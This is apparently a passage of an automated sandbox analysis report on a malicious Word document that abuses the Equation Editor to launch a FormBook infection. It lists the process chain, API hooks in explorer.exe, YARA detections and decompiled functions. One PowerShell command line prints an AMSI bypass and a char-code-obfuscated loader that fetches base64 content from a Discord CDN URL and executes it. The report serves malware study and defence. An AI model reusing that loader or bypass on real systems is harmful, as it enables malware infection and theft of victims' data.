                                                      2021-12-02 17:26:37 UTC1847INData Raw: 41 32 52 53 78 67 4d 7a 6b 73 59 44 41 32 4c 47 41 77 51 79 78 67 4d 44 4d 73 59 44 4a 42 4c 47 41 7a 4d 53 78 67 4e 55 4d 73 59 44 6b 79 4c 47 42 44 4f 43 78 67 4e 45 59 73 59 44 6c 42 4c 47 41 35 4e 79 78 67 52 6b 49 73 59 45 55 78 4c 47 42 44 4f 43 78 67 52 44 51 73 59 44 4e 42 4c 47 41 78 52 43 78 67 4e 54 55 73 59 44 68 44 4c 47 41 30 4d 53 78 67 4f 54 49 73 59 44 51 7a 4c 47 41 79 52 69 78 67 51 7a 59 73 59 44 45 31 4c 47 41 34 4e 79 78 67 52 55 49 73 59 45 5a 46 4c 47 42 42 4e 79 78 67 51 6a 67 73 59 44 4a 47 4c 47 41 30 4d 79 78 67 4f 54 6b 73 59 44 4d 33 4c 47 41 79 4e 53 78 67 4e 6a 55 73 59 45 59 33 4c 47 41 35 4d 69 78 67 52 44 67 73 59 45 4e 45 4c 47 41 7a 52 53 78 67 52 55 55 73 59 44 63 33 4c 47 41 34 4e 79 78 67 4f 54 63 73 59 45 51 77 4c
                                                      Data Ascii: A2RSxgMzksYDA2LGAwQyxgMDMsYDJBLGAzMSxgNUMsYDkyLGBDOCxgNEYsYDlBLGA5NyxgRkIsYEUxLGBDOCxgRDQsYDNBLGAxRCxgNTUsYDhDLGA0MSxgOTIsYDQzLGAyRixgQzYsYDE1LGA4NyxgRUIsYEZFLGBBNyxgQjgsYDJGLGA0MyxgOTksYDM3LGAyNSxgNjUsYEY3LGA5MixgRDgsYENELGAzRSxgRUUsYDc3LGA4NyxgOTcsYEQwL
                                                      2021-12-02 17:26:37 UTC1863INData Raw: 41 79 52 69 78 67 51 54 51 73 59 44 45 31 4c 47 41 31 4e 43 78 67 4d 7a 49 73 59 44 6b 31 4c 47 42 46 51 79 78 67 52 6a 41 73 59 44 46 42 4c 47 42 44 51 79 78 67 51 6a 67 73 59 45 5a 43 4c 47 42 43 4d 79 78 67 4e 6a 63 73 59 44 67 78 4c 47 41 7a 52 69 78 67 52 44 55 73 59 44 6b 30 4c 47 42 44 4f 53 78 67 4d 6a 67 73 59 44 56 43 4c 47 41 78 4d 43 78 67 4d 7a 49 73 59 45 51 33 4c 47 42 47 4d 43 78 67 4e 30 51 73 59 44 41 33 4c 47 41 35 4e 43 78 67 52 6b 55 73 59 45 49 7a 4c 47 42 44 4e 43 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 45 51 69 78 67 4d 54 63 73 59 44 55 34 4c 47 42 47 4f 53 78 67 52 6b 4d 73 59 44 6c 47 4c 47 42 46 4f 53 78 67 4d 54 45 73 59 45 45 78 4c 47 41 33 4d 43 78 67 4f 55 45 73 59 45 4d 31 4c 47 41 32 4d 43 78 67 4d 44 45 73 59 45 51 33 4c
                                                      Data Ascii: AyRixgQTQsYDE1LGA1NCxgMzIsYDk1LGBFQyxgRjAsYDFBLGBDQyxgQjgsYEZCLGBCMyxgNjcsYDgxLGAzRixgRDUsYDk0LGBDOSxgMjgsYDVCLGAxMCxgMzIsYEQ3LGBGMCxgN0QsYDA3LGA5NCxgRkUsYEIzLGBDNCxgRkUsYDgzLGBEQixgMTcsYDU4LGBGOSxgRkMsYDlGLGBFOSxgMTEsYEExLGA3MCxgOUEsYEM1LGA2MCxgMDEsYEQ3L
                                                      2021-12-02 17:26:37 UTC1875INData Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c
                                                      Data Ascii: AwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwL


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      PeekMessageAINLINEexplorer.exe
                                                      PeekMessageWINLINEexplorer.exe
                                                      GetMessageWINLINEexplorer.exe
                                                      GetMessageAINLINEexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: USER32.dll
                                                      Function NameHook TypeNew Data
                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: WINWORD.EXE PID: 2704 Parent PID: 596

                                                      General

                                                      Start time:18:25:17
                                                      Start date:02/12/2021
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13f800000
                                                      File size:1423704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: EQNEDT32.EXE PID: 668 Parent PID: 596

                                                      General

                                                      Start time:18:25:19
                                                      Start date:02/12/2021
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: cmd.exe PID: 2996 Parent PID: 668

                                                      General

                                                      Start time:18:25:20
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:CmD.exe /C cscript %tmp%\Client.vbs A C
                                                      Imagebase:0x4a470000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: cscript.exe PID: 2700 Parent PID: 2996

                                                      General

                                                      Start time:18:25:21
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
                                                      Imagebase:0x460000
                                                      File size:126976 bytes
                                                      MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 1344 Parent PID: 1304

                                                      General

                                                      Start time:18:25:22
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,50,48,54,48,55,50,48,52,53,53,55,56,47,109,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($91534784575270519153478457527051915347845752705191534784575270519153478457527051)|I`E`X
                                                      Imagebase:0x13f920000
                                                      File size:473600 bytes
                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: calc.exe PID: 2008 Parent PID: 1344

                                                      General

                                                      Start time:18:25:55
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\calc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:{path}
                                                      Imagebase:0xa60000
                                                      File size:776192 bytes
                                                      MD5 hash:60B7C0FEAD45F2066E5B805A91F4F0FC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: explorer.exe PID: 1764 Parent PID: 2008

                                                      General

                                                      Start time:18:25:57
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xffa10000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: cscript.exe PID: 2816 Parent PID: 1764

                                                      General

                                                      Start time:18:26:18
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                                      Imagebase:0xb80000
                                                      File size:126976 bytes
                                                      MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: cmd.exe PID: 2408 Parent PID: 2816

                                                      General

                                                      Start time:18:26:22
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\WINDOWS\syswow64\calc.exe"
                                                      Imagebase:0x49da0000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: calc.exe PID: 2008 Parent PID: 1344 calc.exeCOMMON

                                                        Executed Functions

                                                        Function 0041A35A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: 51fdd5af026d6288b84a79521390282caee80f4da8fb3eaccbeb81e4e2d7e8ac
                                                        • Instruction ID: 11b7dea4e4b245aed764eb1a0e7efbb34c8d6c43397d0661aa51e9aeef63cc21
                                                        • Opcode Fuzzy Hash: 51fdd5af026d6288b84a79521390282caee80f4da8fb3eaccbeb81e4e2d7e8ac
                                                        • Instruction Fuzzy Hash: ED21F2B6204108AFCB08DF99DC90DEB73A9EF8C714B15865AFE0D97241D634E8528BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                        0x0041a413
                                                        0x0041a41f
                                                        0x0041a427
                                                        0x0041a42c
                                                        0x0041a432
                                                        0x0041a44d
                                                        0x0041a455
                                                        0x0041a459

                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                        0x0040ad0c
                                                        0x0040ad0f
                                                        0x0040ad14
                                                        0x0040ad19
                                                        0x0040ad23
                                                        0x0040ad28
                                                        0x0040ad2b
                                                        0x0040ad2d
                                                        0x0040ad35
                                                        0x0040ad3a
                                                        0x0040ad3a
                                                        0x0040ad41
                                                        0x0040ad49
                                                        0x0040ad4c
                                                        0x0040ad4e
                                                        0x0040ad62
                                                        0x00000000
                                                        0x0040ad64
                                                        0x0040ad6a
                                                        0x0040ad1e
                                                        0x0040ad1e
                                                        0x0040ad1e

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A48A, Relevance: 1.5, APIs: 1, Instructions: 35nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A48A(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {

				if (__eflags > 0) goto L3;
			}



                                                        0x0041a48f

                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: ae70898eeba45950c950b20f57446945f3c6375c956b339253ca8bdc1beeb993
                                                        • Instruction ID: 250678ca2aebfc1960b203ee31a1614b0516f2d1367de9df9d74293b1b664355
                                                        • Opcode Fuzzy Hash: ae70898eeba45950c950b20f57446945f3c6375c956b339253ca8bdc1beeb993
                                                        • Instruction Fuzzy Hash: 8AF05EB6200114ABD720EF98DC80EEB73A9EF88720F248559FA0C9B241C634E91187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
